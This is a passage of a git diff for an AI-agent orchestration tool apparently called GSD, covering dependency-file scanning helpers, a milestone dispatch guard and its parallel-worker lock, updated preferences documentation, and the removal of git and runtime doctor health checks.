containsDirectSpringBootReference(relativePath: string, content: string): boolean { + if (relativePath.endsWith("pom.xml")) { + return /\s*org\.springframework\.boot\s*<\/groupId>/i.test(content); + } + + if (relativePath.endsWith("build.gradle") || relativePath.endsWith("build.gradle.kts")) { + return 
/(id\s*\(?\s*["']org\.springframework\.boot["']|apply\s*\(?\s*plugin\s*[:=]\s*["']org\.springframework\.boot["']|(?:implementation|api|compileOnly|runtimeOnly|testImplementation|annotationProcessor|kapt)\s*\(?\s*["'][^"']*org\.springframework\.boot:[^"']*spring-boot[^"']*["'])/i.test(content); + } + + return false; +} + +function extractPyprojectDependencySections(content: string): string { + const lines = content.split("\n"); + const collected: string[] = []; + let section = ""; + let collectingProjectDeps = false; + let collectingOptionalDeps = false; + let bracketDepth = 0; + + for (const line of lines) { + const trimmed = line.trim(); + + if (collectingProjectDeps) { + collected.push(line); + bracketDepth += countChar(line, "[") - countChar(line, "]"); + if (bracketDepth <= 0) { + collectingProjectDeps = false; + } + continue; + } + + if (collectingOptionalDeps) { + collected.push(line); + bracketDepth += countChar(line, "[") - countChar(line, "]"); + if (bracketDepth <= 0) { + collectingOptionalDeps = false; + } + continue; + } + + const sectionMatch = trimmed.match(/^\[([^\]]+)\]$/); + if (sectionMatch) { + section = sectionMatch[1].trim(); + continue; + } + + if (section === "project" && /^dependencies\s*=\s*\[/.test(trimmed)) { + collected.push(line); + bracketDepth = countChar(line, "[") - countChar(line, "]"); + collectingProjectDeps = bracketDepth > 0; + continue; + } + + if ( + section === "project.optional-dependencies" || + section === "tool.poetry.dependencies" + ) { + if (section === "project.optional-dependencies") { + const equalsIndex = line.indexOf("="); + if (equalsIndex !== -1) { + const value = line.slice(equalsIndex + 1); + collected.push(value); + bracketDepth = countChar(value, "[") - countChar(value, "]"); + collectingOptionalDeps = bracketDepth > 0; + } + } else { + collected.push(line); + } + } + } + + return collected.join("\n"); +} + +function countChar(text: string, char: string): number { + return [...text].filter((c) => c === 
char).length; +} + +function normalizePackageName(name: string): string { + return name.toLowerCase().replace(/[_.]/g, "-"); +} + +function normalizePluginAlias(alias: string): string { + return alias.toLowerCase().replace(/[-_]/g, "."); +} + +function versionCatalogAccessorName(relativePath: string): string { + const normalized = relativePath.replaceAll("\\", "/"); + const basename = normalized.slice(normalized.lastIndexOf("/") + 1); + return basename.replace(/\.versions\.toml$/i, "").toLowerCase(); +} + +function resolveVersionCatalogAccessors( + basePath: string, + versionCatalogFiles: string[], + settingsFiles: string[], +): Set { + const accessors = new Set(versionCatalogFiles.map(versionCatalogAccessorName).filter(Boolean)); + if (versionCatalogFiles.length === 0 || settingsFiles.length === 0) { + return accessors; + } + + for (const settingsFile of settingsFiles) { + try { + const raw = readBounded(join(basePath, settingsFile), 64 * 1024); + const content = stripDependencyComments(settingsFile, raw); + const createRe = /create\(\s*["']([A-Za-z0-9_]+)["']\s*\)\s*\{[\s\S]*?([A-Za-z0-9_.-]+\.versions\.toml)["']?\s*\)\s*\)/g; + let match: RegExpExecArray | null; + while ((match = createRe.exec(content)) !== null) { + const accessor = match[1].toLowerCase(); + const catalogBasename = match[2].replaceAll("\\", "/").split("/").pop()!; + if (versionCatalogFiles.some((file) => { + const normalized = file.replaceAll("\\", "/"); + return normalized === catalogBasename || normalized.endsWith(`/${catalogBasename}`); + })) { + accessors.add(accessor); + } + } + } catch { + // unreadable settings file — ignore + } + } + + return accessors; +} + +export function scanProjectFiles(basePath: string): string[] { + const files: string[] = []; + const queue: Array<{ path: string; depth: number }> = [{ path: basePath, depth: 0 }]; + + while (queue.length > 0 && files.length < MAX_RECURSIVE_SCAN_FILES) { + const current = queue.shift()!; + let entries: Array<{ name: string; 
isDirectory(): boolean; isFile(): boolean }>; + try { + entries = readdirSync(current.path, { withFileTypes: true, encoding: "utf8" }); + } catch { + continue; + } + + for (const entry of entries) { + const entryPath = join(current.path, entry.name); + const relativePath = entryPath.slice(basePath.length + 1); + + if (entry.isDirectory()) { + if (current.depth < MAX_RECURSIVE_SCAN_DEPTH && !RECURSIVE_SCAN_IGNORED_DIRS.has(entry.name)) { + queue.push({ path: entryPath, depth: current.depth + 1 }); + } + continue; + } + + if (!entry.isFile()) continue; + files.push(relativePath); + if (files.length >= MAX_RECURSIVE_SCAN_FILES) break; + } + } + + return files; +} diff --git a/src/resources/extensions/gsd/dispatch-guard.ts b/src/resources/extensions/gsd/dispatch-guard.ts index e0f065fea..c687f1b30 100644 --- a/src/resources/extensions/gsd/dispatch-guard.ts +++ b/src/resources/extensions/gsd/dispatch-guard.ts @@ -1,10 +1,12 @@ // GSD Dispatch Guard — prevents out-of-order slice dispatch -import { readFileSync } from "node:fs"; -import { readdirSync } from "node:fs"; -import { resolveMilestoneFile, milestonesDir } from "./paths.js"; -import { parseRoadmapSlices } from "./roadmap-slices.js"; +import { resolveMilestoneFile } from "./paths.js"; import { findMilestoneIds } from "./guided-flow.js"; +import { parseUnitId } from "./unit-id.js"; +import { isDbAvailable, getMilestoneSlices } from "./gsd-db.js"; +import { parseRoadmap } from "./parsers-legacy.js"; +import { isClosedStatus } from "./status-guards.js"; +import { readFileSync } from "node:fs"; const SLICE_DISPATCH_TYPES = new Set([ "research-slice", @@ -14,28 +16,6 @@ const SLICE_DISPATCH_TYPES = new Set([ "complete-slice", ]); -/** - * Read a roadmap file from disk (working tree) rather than from a git branch. - * - * Prior implementation used `git show :` which read committed - * state on a specific branch. 
This caused false-positive blockers when work - * was committed on a milestone/worktree branch but the integration branch - * (main) hadn't been updated yet — the guard would see prior slices as - * incomplete on main even though they were done in the working tree (#530). - * - * Reading from disk always reflects the latest state, regardless of which - * branch is checked out or whether changes have been committed. - */ -function readRoadmapFromDisk(base: string, milestoneId: string): string | null { - try { - const absPath = resolveMilestoneFile(base, milestoneId, "ROADMAP"); - if (!absPath) return null; - return readFileSync(absPath, "utf-8").trim(); - } catch { - return null; - } -} - export function getPriorSliceCompletionBlocker( base: string, _mainBranch: string, @@ -44,12 +24,23 @@ export function getPriorSliceCompletionBlocker( ): string | null { if (!SLICE_DISPATCH_TYPES.has(unitType)) return null; - const [targetMid, targetSid] = unitId.split("/"); + const { milestone: targetMid, slice: targetSid } = parseUnitId(unitId); if (!targetMid || !targetSid) return null; + // Parallel worker isolation: when GSD_MILESTONE_LOCK is set, this worker + // is scoped to a single milestone. Skip the cross-milestone dependency + // check — other milestones are being handled by their own workers. + // Without this, the dispatch guard sees incomplete slices in M010/M011 + // (cloned into the worktree DB) and blocks M012 from ever starting. #2797 + const milestoneLock = process.env.GSD_MILESTONE_LOCK; + // Use findMilestoneIds to respect custom queue order. // Only check milestones that come BEFORE the target in queue order. - const allIds = findMilestoneIds(base); + // When locked to a specific milestone, only check that milestone's + // intra-slice dependencies — skip all cross-milestone checks. + const allIds = milestoneLock && targetMid === milestoneLock + ? 
[targetMid] + : findMilestoneIds(base); const targetIdx = allIds.indexOf(targetMid); if (targetIdx < 0) return null; const milestoneIds = allIds.slice(0, targetIdx + 1); @@ -58,11 +49,35 @@ export function getPriorSliceCompletionBlocker( if (resolveMilestoneFile(base, mid, "PARKED")) continue; if (resolveMilestoneFile(base, mid, "SUMMARY")) continue; - // Read from disk (working tree) — always has the latest state - const roadmapContent = readRoadmapFromDisk(base, mid); - if (!roadmapContent) continue; + // Normalised slice list from DB or file fallback + type NormSlice = { id: string; done: boolean; depends: string[] }; + let slices: NormSlice[] | null = null; + + if (isDbAvailable()) { + const rows = getMilestoneSlices(mid); + if (rows.length > 0) { + slices = rows.map((r) => ({ + id: r.id, + done: isClosedStatus(r.status), + depends: r.depends ?? [], + })); + } + } + if (!slices) { + // File-based fallback: parse roadmap checkboxes + const roadmapPath = resolveMilestoneFile(base, mid, "ROADMAP"); + if (!roadmapPath) continue; + let roadmapContent: string; + try { roadmapContent = readFileSync(roadmapPath, "utf-8"); } catch { continue; } + const parsed = parseRoadmap(roadmapContent); + if (parsed.slices.length === 0) continue; + slices = parsed.slices.map((s) => ({ + id: s.id, + done: s.done, + depends: s.depends ?? [], + })); + } - const slices = parseRoadmapSlices(roadmapContent); if (mid !== targetMid) { const incomplete = slices.find((slice) => !slice.done); if (incomplete) { diff --git a/src/resources/extensions/gsd/docs/preferences-reference.md b/src/resources/extensions/gsd/docs/preferences-reference.md index f3b2ccd0f..cc8c4b3b0 100644 --- a/src/resources/extensions/gsd/docs/preferences-reference.md +++ b/src/resources/extensions/gsd/docs/preferences-reference.md @@ -1,6 +1,6 @@ # GSD Preferences Reference -Full documentation for `~/.gsd/preferences.md` (global) and `.gsd/preferences.md` (project). 
+Full documentation for `~/.gsd/PREFERENCES.md` (global) and `.gsd/PREFERENCES.md` (project). --- @@ -51,8 +51,8 @@ skill_rules: [] Preferences are loaded from two locations and merged: -1. **Global:** `~/.gsd/preferences.md` — applies to all projects -2. **Project:** `.gsd/preferences.md` — applies to the current project only +1. **Global:** `~/.gsd/PREFERENCES.md` — applies to all projects +2. **Project:** `.gsd/PREFERENCES.md` — applies to the current project only **Merge behavior** (see `mergePreferences()` in `preferences.ts`): @@ -102,12 +102,14 @@ Setting `prefer_skills: []` does **not** disable skill discovery — it just mea - `custom_instructions`: extra durable instructions related to skill use. For operational project knowledge (recurring rules, gotchas, patterns), use `.gsd/KNOWLEDGE.md` instead — it's injected into every agent prompt automatically and agents can append to it during execution. -- `models`: per-stage model selection for auto-mode. Keys: `research`, `planning`, `execution`, `execution_simple`, `completion`, `subagent`. Values can be: +- `models`: per-stage model selection (applies to both auto-mode and guided-flow dispatches). Keys: `research`, `planning`, `discuss`, `execution`, `execution_simple`, `completion`, `validation`, `subagent`. Values can be: - Simple string: `"claude-sonnet-4-6"` — single model, no fallbacks - Provider-qualified string: `"bedrock/claude-sonnet-4-6"` — targets a specific provider when the same model ID exists across multiple providers - Object with fallbacks: `{ model: "claude-opus-4-6", fallbacks: ["glm-5", "minimax-m2.5"] }` — tries fallbacks in order if primary fails - Object with provider: `{ model: "claude-opus-4-6", provider: "bedrock" }` — explicit provider targeting in object format - - Omit a key to use whatever model is currently active. Fallbacks are tried when model switching fails (provider unavailable, rate limited, etc.). 
+ - Omit a key to use whatever model is currently active (except `discuss` and `validation` which fall back to `planning` when unset). Fallbacks are tried when model switching fails (provider unavailable, rate limited, etc.). + - `discuss` — used for milestone/slice discussion (interactive context gathering). Falls back to `planning` if unset. + - `validation` — used for gate evaluation, roadmap reassessment, milestone validation, and doc rewrites. Falls back to `planning` if unset. - `skill_staleness_days`: number — skills unused for this many days get deprioritized during discovery. Set to `0` to disable staleness tracking. Default: `60`. @@ -126,8 +128,8 @@ Setting `prefer_skills: []` does **not** disable skill discovery — it just mea - `auto_push`: boolean — automatically push commits to the remote after committing. Default: `false`. - `push_branches`: boolean — push the milestone branch to the remote after commits. Default: `false`. - `remote`: string — git remote name to push to. Default: `"origin"`. - - `snapshots`: boolean — create snapshot commits (WIP saves) during long-running tasks. Default: `false`. - - `pre_merge_check`: boolean or `"auto"` — run pre-merge checks before merging a worktree back to the integration branch. `true` always runs, `false` never runs, `"auto"` runs when CI is detected. Default: `false`. + - `snapshots`: boolean — create snapshot commits (WIP saves) during long-running tasks. Default: `true`. + - `pre_merge_check`: boolean or `"auto"` — run pre-merge checks before merging a worktree back to the integration branch. `true` always runs, `false` never runs, `"auto"` runs when CI is detected. Default: `"auto"`. - `commit_type`: string — override the conventional commit type prefix. Must be one of: `feat`, `fix`, `refactor`, `docs`, `test`, `chore`, `perf`, `ci`, `build`, `style`. Default: inferred from diff content. - `main_branch`: string — the primary branch name for new git repos (e.g., `"main"`, `"master"`, `"trunk"`). 
Also used by `getMainBranch()` as the preferred branch when auto-detection is ambiguous. Default: `"main"`. - `merge_strategy`: `"squash"` or `"merge"` — controls how worktree branches are merged back. `"squash"` combines all commits into one; `"merge"` preserves individual commits. Default: `"squash"`. @@ -187,6 +189,13 @@ Setting `prefer_skills: []` does **not** disable skill discovery — it just mea - `budget_pressure`: boolean — downgrade model tier when budget is under pressure. Default: `true`. - `cross_provider`: boolean — allow routing across different providers. Default: `true`. - `hooks`: boolean — enable routing hooks. Default: `true`. + - `capability_routing`: boolean — enable capability-profile scoring for model selection within a tier. Requires `enabled: true`. Default: `false`. + +- `context_management`: configures context hygiene for auto-mode sessions. Keys: + - `observation_masking`: boolean — mask old tool results to reduce context bloat. Default: `true`. + - `observation_mask_turns`: number — keep this many recent turns verbatim (1-50). Default: `8`. + - `compaction_threshold_percent`: number — trigger compaction at this % of context window (0.5-0.95). Lower values fire compaction earlier, reducing drift. Default: `0.70`. + - `tool_result_max_chars`: number — max chars per tool result in GSD sessions (200-10000). Default: `800`. - `auto_visualize`: boolean — show a visualizer hint after each milestone completion in auto-mode. Default: `false`. @@ -202,6 +211,7 @@ Setting `prefer_skills: []` does **not** disable skill discovery — it just mea - `budget_ceiling`: number — optional per-parallel-run budget ceiling. - `merge_strategy`: `"per-slice"` or `"per-milestone"` — when to merge worktree results back. Default: `"per-milestone"`. - `auto_merge`: `"auto"`, `"confirm"`, or `"manual"` — merge behavior after completion. `"auto"` merges immediately; `"confirm"` asks first; `"manual"` leaves branches for you. Default: `"confirm"`. 
+ - `worker_model`: string — optional model override for parallel milestone workers. When set, workers use this model (e.g. `"claude-haiku-4-5"`) instead of inheriting the coordinator's model. Useful for cost savings on execution-heavy milestones. - `verification_commands`: string[] — shell commands to run as verification after task execution (e.g., `["npm test", "npm run lint"]`). Commands run in order; if any fails, the task is marked as needing fixes. @@ -241,6 +251,9 @@ Setting `prefer_skills: []` does **not** disable skill discovery — it just mea **Known unit types for `before`/`after`:** `research-milestone`, `plan-milestone`, `research-slice`, `plan-slice`, `execute-task`, `complete-slice`, `replan-slice`, `reassess-roadmap`, `run-uat`. +- `experimental`: opt-in experimental features. All features here are **off by default** — you must explicitly set each one to `true` to enable it. Features in this block may change or be removed without a deprecation cycle while in experimental status. Keys: + - `rtk`: boolean — enable RTK (Real-Time Kompression) shell-command compression. When enabled, GSD wraps shell commands through the RTK binary to reduce token usage during command execution. RTK is downloaded automatically on first use if not already installed. **Default: `false`** (opt-in required). Set `GSD_RTK_DISABLED=1` in the environment to force-disable regardless of this preference. + --- ## Best Practices @@ -652,3 +665,15 @@ verification_max_retries: 2 ``` Runs test, lint, and typecheck after each task. On failure, auto-fix is attempted up to 2 times before reporting the issue. + +## Experimental Features Example + +```yaml +--- +version: 1 +experimental: + rtk: true +--- +``` + +Opts in to RTK shell-command compression. RTK is downloaded automatically on first use. Set `GSD_RTK_DISABLED=1` to force-disable at the environment level regardless of this setting. 
diff --git a/src/resources/extensions/gsd/doctor-checks.ts b/src/resources/extensions/gsd/doctor-checks.ts index 64eb0a921..d9a26e66c 100644 --- a/src/resources/extensions/gsd/doctor-checks.ts +++ b/src/resources/extensions/gsd/doctor-checks.ts @@ -1,1068 +1,5 @@ -import { existsSync, lstatSync, readdirSync, readFileSync, realpathSync, rmSync, statSync } from "node:fs"; -import { basename, dirname, join, sep } from "node:path"; - -import type { DoctorIssue, DoctorIssueCode } from "./doctor-types.js"; -import { readRepoMeta, externalProjectsRoot } from "./repo-identity.js"; -import { loadFile, parseRoadmap } from "./files.js"; -import { resolveMilestoneFile, milestonesDir, gsdRoot, resolveGsdRootFile, relGsdRootFile } from "./paths.js"; -import { deriveState, isMilestoneComplete } from "./state.js"; -import { saveFile } from "./files.js"; -import { listWorktrees, resolveGitDir, worktreesDir } from "./worktree-manager.js"; -import { abortAndReset } from "./git-self-heal.js"; -import { RUNTIME_EXCLUSION_PATHS, resolveMilestoneIntegrationBranch, writeIntegrationBranch } from "./git-service.js"; -import { nativeIsRepo, nativeBranchExists, nativeWorktreeList, nativeWorktreeRemove, nativeBranchList, nativeBranchDelete, nativeLsFiles, nativeRmCached, nativeForEachRef, nativeUpdateRef } from "./native-git-bridge.js"; -import { readCrashLock, isLockProcessAlive, clearLock } from "./crash-recovery.js"; -import { ensureGitignore } from "./gitignore.js"; -import { getAllWorktreeHealth } from "./worktree-health.js"; -import { readAllSessionStatuses, isSessionStale, removeSessionStatus } from "./session-status-io.js"; -import { recoverFailedMigration } from "./migrate-external.js"; -import { loadEffectiveGSDPreferences } from "./preferences.js"; - -export async function checkGitHealth( - basePath: string, - issues: DoctorIssue[], - fixesApplied: string[], - shouldFix: (code: DoctorIssueCode) => boolean, - isolationMode: "none" | "worktree" | "branch" = "worktree", -): Promise { - 
// Degrade gracefully if not a git repo - if (!nativeIsRepo(basePath)) { - return; // Not a git repo — skip all git health checks - } - - const gitDir = resolveGitDir(basePath); - - // ── Orphaned auto-worktrees & Stale milestone branches ──────────────── - // These checks only apply in worktree/branch modes — skip in none mode - // where no milestone worktrees or branches are created. - if (isolationMode !== "none") { - try { - const worktrees = listWorktrees(basePath); - const milestoneWorktrees = worktrees.filter(wt => wt.branch.startsWith("milestone/")); - - // Load roadmap state once for cross-referencing - const state = await deriveState(basePath); - - for (const wt of milestoneWorktrees) { - // Extract milestone ID from branch name "milestone/M001" → "M001" - const milestoneId = wt.branch.replace(/^milestone\//, ""); - const milestoneEntry = state.registry.find(m => m.id === milestoneId); - - // Check if milestone is complete via roadmap - let isComplete = false; - if (milestoneEntry) { - const roadmapPath = resolveMilestoneFile(basePath, milestoneId, "ROADMAP"); - const roadmapContent = roadmapPath ? 
await loadFile(roadmapPath) : null; - if (roadmapContent) { - const roadmap = parseRoadmap(roadmapContent); - isComplete = isMilestoneComplete(roadmap); - } - } - - if (isComplete) { - issues.push({ - severity: "warning", - code: "orphaned_auto_worktree", - scope: "milestone", - unitId: milestoneId, - message: `Worktree for completed milestone ${milestoneId} still exists at ${wt.path}`, - fixable: true, - }); - - if (shouldFix("orphaned_auto_worktree")) { - // Never remove a worktree matching current working directory - const cwd = process.cwd(); - if (wt.path === cwd || cwd.startsWith(wt.path + sep)) { - fixesApplied.push(`skipped removing worktree at ${wt.path} (is cwd)`); - } else { - try { - nativeWorktreeRemove(basePath, wt.path, true); - fixesApplied.push(`removed orphaned worktree ${wt.path}`); - } catch { - fixesApplied.push(`failed to remove worktree ${wt.path}`); - } - } - } - } - } - - // ── Stale milestone branches ───────────────────────────────────────── - try { - const branches = nativeBranchList(basePath, "milestone/*"); - if (branches.length > 0) { - const worktreeBranches = new Set(milestoneWorktrees.map(wt => wt.branch)); - - for (const branch of branches) { - // Skip branches that have a worktree (handled above) - if (worktreeBranches.has(branch)) continue; - - const milestoneId = branch.replace(/^milestone\//, ""); - const roadmapPath = resolveMilestoneFile(basePath, milestoneId, "ROADMAP"); - const roadmapContent = roadmapPath ? 
await loadFile(roadmapPath) : null; - if (!roadmapContent) continue; - - const roadmap = parseRoadmap(roadmapContent); - if (isMilestoneComplete(roadmap)) { - issues.push({ - severity: "info", - code: "stale_milestone_branch", - scope: "milestone", - unitId: milestoneId, - message: `Branch ${branch} exists for completed milestone ${milestoneId}`, - fixable: true, - }); - - if (shouldFix("stale_milestone_branch")) { - try { - nativeBranchDelete(basePath, branch, true); - fixesApplied.push(`deleted stale branch ${branch}`); - } catch { - fixesApplied.push(`failed to delete branch ${branch}`); - } - } - } - } - } - } catch { - // git branch list failed — skip stale branch check - } - } catch { - // listWorktrees or deriveState failed — skip worktree/branch checks - } - } // end isolationMode !== "none" - - // ── Corrupt merge state ──────────────────────────────────────────────── - try { - const mergeStateFiles = ["MERGE_HEAD", "SQUASH_MSG"]; - const mergeStateDirs = ["rebase-apply", "rebase-merge"]; - const found: string[] = []; - - for (const f of mergeStateFiles) { - if (existsSync(join(gitDir, f))) found.push(f); - } - for (const d of mergeStateDirs) { - if (existsSync(join(gitDir, d))) found.push(d); - } - - if (found.length > 0) { - issues.push({ - severity: "error", - code: "corrupt_merge_state", - scope: "project", - unitId: "project", - message: `Corrupt merge/rebase state detected: ${found.join(", ")}`, - fixable: true, - }); - - if (shouldFix("corrupt_merge_state")) { - const result = abortAndReset(basePath); - fixesApplied.push(`cleaned merge state: ${result.cleaned.join(", ")}`); - } - } - } catch { - // Can't check .git dir — skip - } - - // ── Tracked runtime files ────────────────────────────────────────────── - try { - const trackedPaths: string[] = []; - for (const exclusion of RUNTIME_EXCLUSION_PATHS) { - try { - const files = nativeLsFiles(basePath, exclusion); - if (files.length > 0) { - trackedPaths.push(...files); - } - } catch { - // Individual 
ls-files can fail — continue - } - } - - if (trackedPaths.length > 0) { - issues.push({ - severity: "warning", - code: "tracked_runtime_files", - scope: "project", - unitId: "project", - message: `${trackedPaths.length} runtime file(s) are tracked by git: ${trackedPaths.slice(0, 5).join(", ")}${trackedPaths.length > 5 ? "..." : ""}`, - fixable: true, - }); - - if (shouldFix("tracked_runtime_files")) { - try { - for (const exclusion of RUNTIME_EXCLUSION_PATHS) { - nativeRmCached(basePath, [exclusion]); - } - fixesApplied.push(`untracked ${trackedPaths.length} runtime file(s)`); - } catch { - fixesApplied.push("failed to untrack runtime files"); - } - } - } - } catch { - // git ls-files failed — skip - } - - // ── Legacy slice branches ────────────────────────────────────────────── - try { - const branchList = nativeBranchList(basePath, "gsd/*/*") - .filter((branch) => !branch.startsWith("gsd/quick/")); - if (branchList.length > 0) { - issues.push({ - severity: "info", - code: "legacy_slice_branches", - scope: "project", - unitId: "project", - message: `${branchList.length} legacy slice branch(es) found: ${branchList.slice(0, 3).join(", ")}${branchList.length > 3 ? "..." : ""}. These are no longer used (branchless architecture).`, - fixable: true, - }); - - if (shouldFix("legacy_slice_branches")) { - let deleted = 0; - for (const branch of branchList) { - try { - nativeBranchDelete(basePath, branch, true); - deleted++; - } catch { /* skip branches that can't be deleted */ } - } - if (deleted > 0) { - fixesApplied.push(`deleted ${deleted} legacy slice branch(es)`); - } - } - } - } catch { - // git branch list failed — skip - } - - // ── Integration branch existence ────────────────────────────────────── - // For each active (non-complete) milestone, verify the stored integration - // branch still exists in git. A missing integration branch blocks merge-back - // and causes the next merge operation to fail silently. 
- try { - const state = await deriveState(basePath); - const gitPrefs = loadEffectiveGSDPreferences()?.preferences?.git ?? {}; - for (const milestone of state.registry) { - if (milestone.status === "complete") continue; - const resolution = resolveMilestoneIntegrationBranch(basePath, milestone.id, gitPrefs); - if (!resolution.recordedBranch) continue; // No stored branch — skip (not yet set) - if (resolution.status === "fallback" && resolution.effectiveBranch) { - issues.push({ - severity: "warning", - code: "integration_branch_missing", - scope: "milestone", - unitId: milestone.id, - message: resolution.reason, - fixable: true, - }); - if (shouldFix("integration_branch_missing")) { - writeIntegrationBranch(basePath, milestone.id, resolution.effectiveBranch); - fixesApplied.push(`updated integration branch for ${milestone.id} to "${resolution.effectiveBranch}"`); - } - continue; - } - - if (resolution.status === "missing") { - issues.push({ - severity: "error", - code: "integration_branch_missing", - scope: "milestone", - unitId: milestone.id, - message: resolution.reason, - fixable: false, - }); - } - } - } catch { - // Non-fatal — integration branch check failed - } - - // ── Orphaned worktree directories ──────────────────────────────────── - // Worktree removal can fail after a branch delete, leaving a directory - // that is no longer registered with git. These orphaned dirs cause - // "already exists" errors when re-creating the same worktree name. - try { - const wtDir = worktreesDir(basePath); - if (existsSync(wtDir)) { - // Resolve symlinks and normalize separators so that symlinked .gsd - // paths (e.g. ~/.gsd/projects//worktrees/…) match the paths - // returned by `git worktree list`. 
- const normalizePath = (p: string): string => { - try { p = realpathSync(p); } catch { /* path may not exist */ } - return p.replaceAll("\\", "/"); - }; - const registeredPaths = new Set( - nativeWorktreeList(basePath).map(entry => normalizePath(entry.path)), - ); - for (const entry of readdirSync(wtDir)) { - const fullPath = join(wtDir, entry); - try { - if (!statSync(fullPath).isDirectory()) continue; - } catch { continue; } - const normalizedFullPath = normalizePath(fullPath); - if (!registeredPaths.has(normalizedFullPath)) { - issues.push({ - severity: "warning", - code: "worktree_directory_orphaned", - scope: "project", - unitId: entry, - message: `Worktree directory ${fullPath} exists on disk but is not registered with git. Run "git worktree prune" or doctor --fix to remove it.`, - fixable: true, - }); - if (shouldFix("worktree_directory_orphaned")) { - try { - rmSync(fullPath, { recursive: true, force: true }); - fixesApplied.push(`removed orphaned worktree directory ${fullPath}`); - } catch { - fixesApplied.push(`failed to remove orphaned worktree directory ${fullPath}`); - } - } - } - } - } - } catch { - // Non-fatal — orphaned worktree directory check failed - } - - // ── Worktree lifecycle checks ────────────────────────────────────────── - // Check GSD-managed worktrees for: merged branches, stale work, dirty - // state, and unpushed commits. Only worktrees under .gsd/worktrees/. - try { - const healthStatuses = getAllWorktreeHealth(basePath); - const cwd = process.cwd(); - - for (const health of healthStatuses) { - const wt = health.worktree; - const isCwd = wt.path === cwd || cwd.startsWith(wt.path + sep); - - // Branch fully merged into main — safe to remove - if (health.mergedIntoMain) { - issues.push({ - severity: "info", - code: "worktree_branch_merged", - scope: "project", - unitId: wt.name, - message: `Worktree "${wt.name}" (branch ${wt.branch}) is fully merged into main${health.safeToRemove ? 
" — safe to remove" : ""}`, - fixable: health.safeToRemove, - }); - - if (health.safeToRemove && shouldFix("worktree_branch_merged") && !isCwd) { - try { - const { removeWorktree } = await import("./worktree-manager.js"); - removeWorktree(basePath, wt.name, { deleteBranch: true, branch: wt.branch }); - fixesApplied.push(`removed merged worktree "${wt.name}" and deleted branch ${wt.branch}`); - } catch { - fixesApplied.push(`failed to remove merged worktree "${wt.name}"`); - } - } - // If merged, skip the stale/dirty/unpushed checks — they're irrelevant - continue; - } - - // Stale: no commits in N days, not merged - if (health.stale) { - const days = Math.floor(health.lastCommitAgeDays); - issues.push({ - severity: "warning", - code: "worktree_stale", - scope: "project", - unitId: wt.name, - message: `Worktree "${wt.name}" has had no commits in ${days} day${days === 1 ? "" : "s"}`, - fixable: false, - }); - } - - // Dirty: uncommitted changes in a worktree (only flag on stale worktrees to avoid noise) - if (health.dirty && health.stale) { - issues.push({ - severity: "warning", - code: "worktree_dirty", - scope: "project", - unitId: wt.name, - message: `Worktree "${wt.name}" has ${health.dirtyFileCount} uncommitted file${health.dirtyFileCount === 1 ? "" : "s"} and is stale`, - fixable: false, - }); - } - - // Unpushed: commits not on any remote (only flag on stale worktrees to avoid noise) - if (health.unpushedCommits > 0 && health.stale) { - issues.push({ - severity: "warning", - code: "worktree_unpushed", - scope: "project", - unitId: wt.name, - message: `Worktree "${wt.name}" has ${health.unpushedCommits} unpushed commit${health.unpushedCommits === 1 ? 
"" : "s"}`, - fixable: false, - }); - } - } - } catch { - // Non-fatal — worktree lifecycle check failed - } -} - -// ── Runtime Health Checks ────────────────────────────────────────────────── -// Checks for stale crash locks, orphaned completed-units, stale hook state, -// activity log bloat, STATE.md drift, and gitignore drift. - -export async function checkRuntimeHealth( - basePath: string, - issues: DoctorIssue[], - fixesApplied: string[], - shouldFix: (code: DoctorIssueCode) => boolean, -): Promise { - const root = gsdRoot(basePath); - - // ── Stale crash lock ────────────────────────────────────────────────── - try { - const lock = readCrashLock(basePath); - if (lock) { - const alive = isLockProcessAlive(lock); - if (!alive) { - issues.push({ - severity: "error", - code: "stale_crash_lock", - scope: "project", - unitId: "project", - message: `Stale auto.lock from PID ${lock.pid} (started ${lock.startedAt}, was executing ${lock.unitType} ${lock.unitId}) — process is no longer running`, - file: ".gsd/auto.lock", - fixable: true, - }); - - if (shouldFix("stale_crash_lock")) { - clearLock(basePath); - fixesApplied.push("cleared stale auto.lock"); - } - } - } - } catch { - // Non-fatal — crash lock check failed - } - - // ── Stranded lock directory ──────────────────────────────────────────── - // proper-lockfile creates a `.gsd.lock/` directory as the OS-level lock - // mechanism. If the process was SIGKILLed or crashed hard, this directory - // can remain on disk without any live process holding it. The next session - // fails to acquire the lock until the directory is removed (#1245). - try { - const lockDir = join(dirname(root), `${basename(root)}.lock`); - if (existsSync(lockDir)) { - const statRes = statSync(lockDir); - if (statRes.isDirectory()) { - // Check if any live process actually holds this lock - const lock = readCrashLock(basePath); - const lockHolderAlive = lock ? 
isLockProcessAlive(lock) : false; - if (!lockHolderAlive) { - issues.push({ - severity: "error", - code: "stranded_lock_directory", - scope: "project", - unitId: "project", - message: `Stranded lock directory "${lockDir}" exists but no live process holds the session lock. This blocks new auto-mode sessions from starting.`, - file: lockDir, - fixable: true, - }); - if (shouldFix("stranded_lock_directory")) { - try { - rmSync(lockDir, { recursive: true, force: true }); - fixesApplied.push(`removed stranded lock directory ${lockDir}`); - } catch { - fixesApplied.push(`failed to remove stranded lock directory ${lockDir}`); - } - } - } - } - } - } catch { - // Non-fatal — stranded lock directory check failed - } - - // ── Stale parallel sessions ──────────────────────────────────────────── - try { - const parallelStatuses = readAllSessionStatuses(basePath); - for (const status of parallelStatuses) { - if (isSessionStale(status)) { - issues.push({ - severity: "warning", - code: "stale_parallel_session", - scope: "project", - unitId: status.milestoneId, - message: `Stale parallel session for ${status.milestoneId} (PID ${status.pid}, started ${new Date(status.startedAt).toISOString()}, last heartbeat ${new Date(status.lastHeartbeat).toISOString()}) — process is no longer running`, - file: `.gsd/parallel/${status.milestoneId}.status.json`, - fixable: true, - }); - - if (shouldFix("stale_parallel_session")) { - removeSessionStatus(basePath, status.milestoneId); - fixesApplied.push(`cleaned up stale parallel session for ${status.milestoneId}`); - } - } - } - } catch { - // Non-fatal — parallel session check failed - } - - // ── Orphaned completed-units keys ───────────────────────────────────── - try { - const completedKeysFile = join(root, "completed-units.json"); - if (existsSync(completedKeysFile)) { - const raw = readFileSync(completedKeysFile, "utf-8"); - const keys: string[] = JSON.parse(raw); - const orphaned: string[] = []; - - for (const key of keys) { - // Key 
